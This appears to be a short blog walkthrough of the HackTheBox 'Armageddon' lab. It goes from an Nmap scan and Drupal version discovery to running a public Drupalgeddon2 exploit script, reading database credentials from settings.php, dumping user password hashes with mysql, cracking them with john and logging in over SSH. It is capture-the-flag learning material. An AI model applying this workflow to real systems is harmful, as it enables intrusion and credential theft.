HackTheBox : Armageddon Walkthrough

Step 1:

Let’s scan for open ports with Nmap

Command: nmap -A

We see open ports here:

22/tcp-SSH port

80/tcp-HTTP port

Step 2:

Lets check the http site on port 80:

If we look at the place where ‘CHANGELOG.txt’ is written in port 80, we will learn the version of Drupal.

Step 3:

Now let’s find exploit for Drupal 7.56

Command: searchspolit Drupal 7.56

Step 4:

Let’s infiltrate the system now

Command: ruby /usr/share/exploitdb/exploits/php/webapps/44449.rb

Step 5:

Let’s look inside

Command: ls

Now let’s look at all the files

Command: find

Now let’s check all the files and the file you see contains some information we need.

Let’s check the file

Command: cat /sites/default/settings.php

Step 6:

Let’s explore the tables in the database!

Command: mysql -u ****** -p************** -D drupal -e ‘show tables;’

When we look at the whole list, we see a list of ‘users’ with possible names and passwords.

Lets check the users list!

Command: mysql -u ********* -p****************** -D drupal -e ‘select * from users;’

We get 2 users and password hashes one of which is an admin!

You can crack this password with the ‘john’ tool.

Step 7:

Now let’s connect to ssh-a with the information we have.

Command : ssh username@

We are in

Checking the file system we have user.txt our first flag!




Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Turbo Dirt Bike Sprint Hack Free Resources Generator

What is Threat Intelligence?

Will a brand new Japanese regulation permit seizure of your crypto?

Artificial Intelligence: Cyber Security and Cyber Attacks. Who is Winning?

Its been a while

{UPDATE} Ёрш - Игра на 14 февраля Hack Free Resources Generator

Machine Learning Intrusion Prevention System (ML-IPS) technology enables FINNEY™ ultra-secure…

{UPDATE} 成語消消樂-中華成語詞典遊戲 Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe: HA Joker CTF

Why I recommend Hackthebox


TryHackMe — IDE